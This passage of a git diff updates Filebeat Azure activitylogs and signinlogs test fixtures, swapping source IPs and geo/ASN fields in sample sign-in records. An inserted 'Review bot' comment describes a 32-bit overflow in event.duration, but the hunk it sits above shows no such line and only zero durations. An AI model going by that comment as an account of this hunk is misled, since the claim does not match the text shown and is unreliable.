Admin\"}},\"claims\":{\"aud\":\"https://management.core.windows.net/\",\"iss\":\"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/\",\"iat\":\"1421876371\",\"nbf\":\"1421876371\",\"exp\":\"1421880271\",\"ver\":\"1.0\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"1e8d8218-c5e7-4578-9acc-9abbd5d23315 \",\"http://schemas.microsoft.com/claims/authnmethodsreferences\":\"pwd\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"2468adf0-8211-44e3-95xq-85137af64708\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\":\"admin@contoso.com\",\"puid\":\"20030000801A118C\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\":\"John\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\":\"Smith\",\"name\":\"John Smith\",\"groups\":\"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\":\" admin@contoso.com\",\"appid\":\"c44b4083-3bq0-49c1-b47d-974e53cbdf3c\",\"appidacr\":\"2\",\"http://schemas.microsoft.com/identity/claims/scope\":\"user_impersonation\",\"http://schemas.microsoft.com/claims/authnclassreference\":\"1\"}},\"level\":\"Information\",\"location\":\"global\",\"properties\":{\"statusCode\":\"Created\",\"serviceRequestId\":\"50d5cddb-8ca0-47ad-9b80-6cde2207f97c\"}}", "event.outcome": "success", "event.type": [ "change" ], "fileset.name": "activitylogs", - "geo.continent_name": "Asia", - "geo.country_iso_code": "JP", - "geo.country_name": "Japan", - "geo.location.lat": 35.69, - "geo.location.lon": 139.69, + "geo.city_name": "London", + "geo.continent_name": "Europe", + "geo.country_iso_code": "GB", + "geo.country_name": "United Kingdom", + "geo.location.lat": 51.5142, + "geo.location.lon": -0.0931, + "geo.region_iso_code": "GB-ENG", + 
"geo.region_name": "England",
 "input.type": "log",
 "log.level": "Information",
 "log.offset": 0,
 "related.ip": [
- "111.111.111.11"
+ "81.2.69.143"
 ],
 "related.user": [
 "admin"
 ],
 "service.type": "azure",
- "source.as.number": 2516,
- "source.as.organization.name": "KDDI CORPORATION",
- "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "JP",
- "source.geo.country_name": "Japan",
- "source.geo.location.lat": 35.69,
- "source.geo.location.lon": 139.69,
- "source.ip": "111.111.111.11",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
index 76dbbd932086..1a3dc7af76f9 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
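Review bot: The context line `"event.duration": -1468967296` in this hunk pins a negative duration for a record whose `durationMs` is 2826; 2826 ms expressed in nanoseconds is 2,826,000,000, and 2,826,000,000 − 2^32 is exactly −1,468,967,296, so the expected value appears to be a 32-bit integer wrap in the pipeline's ms→ns conversion rather than the real duration. The commit only swaps the IP addresses and geo fields and leaves this value in place, so the regression fixture currently locks the overflowed result in. The conversion belongs in a 64-bit computation, after which this file should be regenerated with `"event.duration": 2826000000`; other activitylogs expected files with the same pattern are worth checking at the same time.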
@@ -1,3 +1,3 @@ -{"Level":4,"callerIpAddress":"81.171.241.231","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} -{"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 
365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} -{"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","durationMs":0,"identity":"Doe, John","location":"US","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office365 Shell WCSS-Client","appId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"On-Prem Access 
Only","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"123ebbf1-e868-4a77-bfd9-b59bd6c2412e","result":"notApplied"},{"conditionsNotSatisfied":0,"conditionsSatisfied":0,"displayName":"ForceMFAfor B2C","enforcedGrantControls":[],"enforcedSessionControls":[],"id":"0dff3d49-001e-413f-86eb-2800e789674c","result":"notEnabled"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline policy: Require MFA for admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"a5527e71-9da1-41d0-859b-7ca84dae03a7","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline Policy: Blocks legacy authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"c1311105-97ac-4ebd-a866-5b215d066765","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"Netscaler MFA","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"ee756a5f-8c3b-41eb-8ace-0839597f718a","result":"notApplied"},{"conditionsNotSatisfied":8,"conditionsSatisfied":19,"displayName":"Enforce Verification on External Access","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"913f5adc-cd20-4b35-93b8-fbe145f68444","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Test Policy","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa","result":"notApplied"}],"authenticationDetails":[{"RequestSequence":0,"StatusSequence":0,"authenticationMethod":"Previously satisfied","authenticationStepDateTime":"2021-01-26T13:39:55.7863053+00:00","authenticationStepRequirement":"Primary authentication","authenticationStepResultDetail":"First factor requirement satisfied by claim in the token","succeeded":true}],"authenticationProcessingDetails":[{"key":"Domain Hint Present","value":"True"},{"key":"Login Hint Present","value":"True"},{"key":"Private 
Link Id","value":"0"},{"key":"Azure AD App Authentication Library","value":"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"clientAppUsed":"Browser","conditionalAccessStatus":"success","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","createdDateTime":"2021-01-26T13:39:55.7863053+00:00","deviceDetail":{"browser":"Chrome 87.0.4280","deviceId":"","operatingSystem":"Windows 10"},"flaggedForReview":false,"id":"a9222177-db03-40ef-9b86-5b207ed72000","ipAddress":"192.168.108.29","isInteractive":true,"location":{"city":"Pierre","countryOrRegion":"US","geoCoordinates":{"latitude":44.567081451416016,"longitude":-100.26722717285156},"state":"South Dakota"},"networkLocationDetails":[],"originalRequestId":"a9222177-db03-40ef-9b86-5b207ed72000","processingTimeInMilliseconds":162,"resourceDisplayName":"Microsoft Graph","resourceId":"00000003-0000-0000-c000-000000000000","resourceTenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36","userDisplayName":"Doe, John","userId":"762a6171-29d0-456b-b88b-ca7f7d99728d","userPrincipalName":"john.doe@example.com","userType":"Member"},"resourceId":"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","time":"2021-01-26T13:39:55.7863053Z"} +{"Level":4,"callerIpAddress":"67.43.156.12","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test 
LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"67.43.156.12","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":4,"callerIpAddress":"175.16.199.1","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 
365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"67.43.156.12","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":4,"callerIpAddress":"175.16.199.1","category":"SignInLogs","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","durationMs":0,"identity":"Doe, John","location":"US","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office365 Shell WCSS-Client","appId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"On-Prem Access 
Only","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"123ebbf1-e868-4a77-bfd9-b59bd6c2412e","result":"notApplied"},{"conditionsNotSatisfied":0,"conditionsSatisfied":0,"displayName":"ForceMFAfor B2C","enforcedGrantControls":[],"enforcedSessionControls":[],"id":"0dff3d49-001e-413f-86eb-2800e789674c","result":"notEnabled"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline policy: Require MFA for admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"a5527e71-9da1-41d0-859b-7ca84dae03a7","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline Policy: Blocks legacy authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"c1311105-97ac-4ebd-a866-5b215d066765","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"Netscaler MFA","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"ee756a5f-8c3b-41eb-8ace-0839597f718a","result":"notApplied"},{"conditionsNotSatisfied":8,"conditionsSatisfied":19,"displayName":"Enforce Verification on External Access","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"913f5adc-cd20-4b35-93b8-fbe145f68444","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Test Policy","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa","result":"notApplied"}],"authenticationDetails":[{"RequestSequence":0,"StatusSequence":0,"authenticationMethod":"Previously satisfied","authenticationStepDateTime":"2021-01-26T13:39:55.7863053+00:00","authenticationStepRequirement":"Primary authentication","authenticationStepResultDetail":"First factor requirement satisfied by claim in the token","succeeded":true}],"authenticationProcessingDetails":[{"key":"Domain Hint Present","value":"True"},{"key":"Login Hint Present","value":"True"},{"key":"Private 
Link Id","value":"0"},{"key":"Azure AD App Authentication Library","value":"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"clientAppUsed":"Browser","conditionalAccessStatus":"success","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","createdDateTime":"2021-01-26T13:39:55.7863053+00:00","deviceDetail":{"browser":"Chrome 87.0.4280","deviceId":"","operatingSystem":"Windows 10"},"flaggedForReview":false,"id":"a9222177-db03-40ef-9b86-5b207ed72000","ipAddress":"192.168.108.29","isInteractive":true,"location":{"city":"Pierre","countryOrRegion":"US","geoCoordinates":{"latitude":44.567081451416016,"longitude":-100.26722717285156},"state":"South Dakota"},"networkLocationDetails":[],"originalRequestId":"a9222177-db03-40ef-9b86-5b207ed72000","processingTimeInMilliseconds":162,"resourceDisplayName":"Microsoft Graph","resourceId":"00000003-0000-0000-c000-000000000000","resourceTenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36","userDisplayName":"Doe, John","userId":"762a6171-29d0-456b-b88b-ca7f7d99728d","userPrincipalName":"john.doe@example.com","userType":"Member"},"resourceId":"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","time":"2021-01-26T13:39:55.7863053Z"} 
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json
index 5ab1d77072a0..cf617019525a 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json
+++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json
@@ -36,7 +36,7 @@
 "azure.signinlogs.result_signature": "None",
 "azure.signinlogs.result_type": "50140",
 "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
- "client.ip": "81.171.241.231",
+ "client.ip": "67.43.156.12",
 "cloud.provider": "azure",
 "event.action": "Sign-in activity",
 "event.category": [
@@ -47,7 +47,7 @@ "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":4,\"callerIpAddress\":\"81.171.241.231\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"67.43.156.12\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"67.43.156.12\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
 "event.outcome": "failure",
 "event.type": [
 "info"
@@ -63,21 +63,17 @@
 "log.offset": 0,
 "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
 "related.ip": [
- "81.171.241.231"
+ "67.43.156.12"
 ],
 "service.type": "azure",
- "source.address": "81.171.241.231",
- "source.as.number": 8426,
- "source.as.organization.name": "Claranet Ltd",
- "source.geo.city_name": "Farnham Royal",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5333,
- "source.geo.location.lon": -0.6167,
- "source.geo.region_iso_code": "GB-BKM",
- "source.geo.region_name": "Buckinghamshire",
- "source.ip": "81.171.241.231",
+ "source.address": "67.43.156.12",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "forwarded"
 ],
@@ -123,7 +119,7 @@
 "azure.signinlogs.result_signature": "None",
 "azure.signinlogs.result_type": "50140",
 "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
- "client.ip": "81.171.241.231",
+ "client.ip": "67.43.156.12",
 "cloud.provider": "azure",
 "event.action": "Sign-in activity",
 "event.category": [
@@ -134,7 +130,7 @@ "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"175.16.199.1\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"67.43.156.12\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test 